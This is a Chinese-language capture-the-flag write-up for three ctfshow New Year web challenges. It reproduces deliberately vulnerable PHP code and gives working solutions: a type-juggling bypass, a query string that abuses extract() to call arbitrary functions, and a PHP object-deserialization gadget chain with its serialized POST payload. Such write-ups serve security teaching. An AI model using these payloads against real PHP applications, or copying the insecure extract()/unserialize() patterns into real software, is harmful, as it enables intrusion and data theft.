ctfshow 年CTF web题解
除夕
<?php
include "flag.php";
$year = $_GET['year'];
if($year==2022 && $year+1!==2023){ echo $flag; }else{ highlight_file(__FILE__); }
|
弱类型比较
初三
<?php
error_reporting(0); extract($_GET); include "flag.php"; highlight_file(__FILE__);
$_=function($__,$___){ return $__==$___?$___:$__; }; $$__($_($_GET{ $___ }[$____]{ $_____ }(),$flag));
|
构造出var_dump($_(phpinfo(),$flag))
即可
/?__=a&a=var_dump&___=b&c[2]=phpinfo&b[1][2]=phpinfo&____=1&_____=2
|
初六
<?php
include "flag.php";
class happy2year{
private $secret; private $key;
function __wakeup(){ $this->secret=""; } function __call($method,$argv){ return call_user_func($this->key, array($method,$argv)); }
function getSecret($key){ $key=$key?$key:$this->key; return $this->createSecret($key); }
function createSecret($key){ return base64_encode($this->key.$this->secret); }
function __get($arg){ global $flag; $arg="get".$arg; $this->$arg = $flag; return $this->secret; }
function __set($arg,$argv){ $this->secret=base64_encode($arg.$argv); }
function __invoke(){ return $this->$secret; }
function __toString(){ return base64_encode($this->secret().$this->secret); }
function __destruct(){ $this->secret = ""; }
}
highlight_file(__FILE__); error_reporting(0); $data=$_POST['data']; $key = $_POST['key']; $obj = unserialize($data); if($obj){ $secret = $obj->getSecret($key); print("你提交的key是".$key."\n生成的secret是".$secret); }
|
当两个变量用.
连接时,也会触发toString
方法,故利用链如下
getSecret -> createSecret -> __toString(有个secret()) -> __call(第一个参数当作函数调用) -> __invoke($secret可以使得访问类中不存在变量) -> __get
|
exp
<?php error_reporting(0);
class happy2year { public $secret = '123'; public $key = 'abc'; } $a = new happy2year(); $a->key = new happy2year(); $a->key->key = new happy2year(); echo urlencode(serialize($a)).PHP_EOL;
?>
|
利用该payload
访问页面即可
POST: data=O%3A10%3A%22happy2year%22%3A2%3A%7Bs%3A6%3A%22secret%22%3Bs%3A3%3A%22123%22%3Bs%3A3%3A%22key%22%3BO%3A10%3A%22happy2year%22%3A2%3A%7Bs%3A6%3A%22secret%22%3Bs%3A3%3A%22123%22%3Bs%3A3%3A%22key%22%3BO%3A10%3A%22happy2year%22%3A2%3A%7Bs%3A6%3A%22secret%22%3Bs%3A3%3A%22123%22%3Bs%3A3%3A%22key%22%3Bs%3A3%3A%22abc%22%3B%7D%7D%7D&key=def
|